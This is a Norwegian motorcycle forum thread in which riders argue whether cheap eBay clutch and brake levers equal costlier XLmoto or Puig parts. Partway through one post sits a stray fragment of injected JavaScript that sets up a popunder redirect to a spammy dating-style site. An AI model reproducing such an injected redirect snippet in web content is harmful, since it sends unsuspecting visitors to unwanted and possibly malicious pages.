Vindskjerm fra ebay

... om verktøy, service, tekniske og mekaniske problemer, reparasjoner og modifiseringer
Brukeravatar
Sakkle
Innlegg: 1080
Registrert: 28 aug 2017, 23:57
Motorsykkelen din: KTM 790 Adventure

Re: Vindskjerm fra ebay

Legg inn av Sakkle »

Diddy96 skrev: 16 jun 2020, 12:59
Sakkle skrev: 15 jun 2020, 00:13 Jeg er ferdig med ebay for godt. Det siste jeg kjøpte derfra var en "side stand extender" som ikke passet til min sykkel på tross av at den skulle være laget til denne modellen. Personlig betaler jeg heller det mangedobbelte på xlmoto... Det ER en grunn til at ebay er billig.
Bestilte clutch og bremsehendler fra ebay som akkurat har ankommet. Prikk like xlmoto sine. Samme vekt, fester og kvalitet som jeg kan se, men 250kr for 2 stk isteden for 500 pr...
Ja, det finnes gode tilbud der. Det er også mye dritt. Men vet aldri helt hva man får før man (forhåpentligvis) har mottatt pakken.

Folk får bestemme selv hvordan de bruker sine penger. Etter min mening er det dog naivt å anta at man får samme kvalitet til 200kr vs. 1000kr, med mindre det beviselig er samme produkt.
2019 KTM 790 Adventure
2008 KTM Duke 690

Toven

Re: Vindskjerm fra ebay

Legg inn av Toven »

Ser jo ganske like ut, fordi de er kopier.. men som regel dårligere materialer, som diskutertbart kan være farlig

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Selv er jeg ganske nøytral. Har kjørt med kina hendler i et par år, men valgte å kjøpe dyrere Puig hendler for en bedre fit. Nå rister ikke clutchhendelen mens jeg kjører, pluss at de føles mye smoothere - vel verdt de ekstra kronene. Kina hendler har også en tendes til å miste fargen relativt kjapt, hvor dyrere ikke gjør dette (antar jeg).

Svar